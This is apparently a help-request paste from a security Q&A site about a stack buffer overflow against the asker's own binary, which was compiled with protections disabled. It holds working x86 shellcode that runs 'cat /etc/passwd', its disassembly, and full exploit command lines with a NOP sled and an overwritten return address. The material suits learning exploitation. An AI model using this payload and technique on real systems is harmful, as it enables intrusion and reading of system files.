  1. // Question URL: http://security.stackexchange.com/questions/148351/
  2. // Shellcode that I built; it is intended to run cat /etc/passwd. It worked just fine in several exploits I did before:
  3. char[] shellcode = "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  4.  
  5. // Objdump of shellcode file:
  6. $ objdump -d shellcode.o
  7.  
  8. shellcode.o:     file format elf32-i386
  9.  
  10. Disassembly of section .text:
  11.  
  12. 00000000 <_start>:
  13.    0:   31 c0                   xor    %eax,%eax
  14.    2:   99                      cltd
  15.    3:   52                      push   %edx
  16.    4:   68 2f 63 61 74          push   $0x7461632f
  17.    9:   68 2f 62 69 6e          push   $0x6e69622f
  18.    e:   89 e3                   mov    %esp,%ebx
  19.   10:   52                      push   %edx
  20.   11:   68 73 73 77 64          push   $0x64777373
  21.   16:   68 2f 2f 70 61          push   $0x61702f2f
  22.   1b:   68 2f 65 74 63          push   $0x6374652f
  23.   20:   89 e1                   mov    %esp,%ecx
  24.   22:   52                      push   %edx
  25.   23:   51                      push   %ecx
  26.   24:   53                      push   %ebx
  27.   25:   89 e1                   mov    %esp,%ecx
  28.   27:   b0 0b                   mov    $0xb,%al
  29.   29:   cd 80                   int    $0x80
  30.  
  31.  
  32. ----------
  33.  
  34. // Command lines and arguments:
  35. // I tried to exploit the program in several ways; I'll paste a few of them here:
  36.  
  37. // Simple shell execute //
  38. $ ./vuln $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
  39.  
  40. // or read the payload from a file
  41. $ ./vuln $(cat payload)
  42.  
  43.  
  44. // RADARE2 //
  45. // Open the program in radare2:
  46. $ r2 -d ./vuln // open in debug mode
  47.  
  48. // inside r2:
  49. // Reopen in debugger mode with args
  50. doo `!!python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"'`
  51.  
  52.  
  53. // GDB //
  54. (gdb) run $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
  55.  
  56.  
  57.  
  58. // System details //
  59. $ uname -a
  60. Linux megabeets 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  61.  
  62. $ file vuln
  63. ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=47ddbe5ef3c4c647670a8be51f2975c11a3501a6, not stripped
  64.  
  65. // The program was compiled using this GCC command:
  66. $ gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
  67.  
  68.  ///////////////////
  69.  // More details //
  70.  ///////////////////
  71.  
  72.  // Offset in the payload that overwrites EIP: 76
  73.  // Payload length: 80
  74.  // NOP-sled length: 28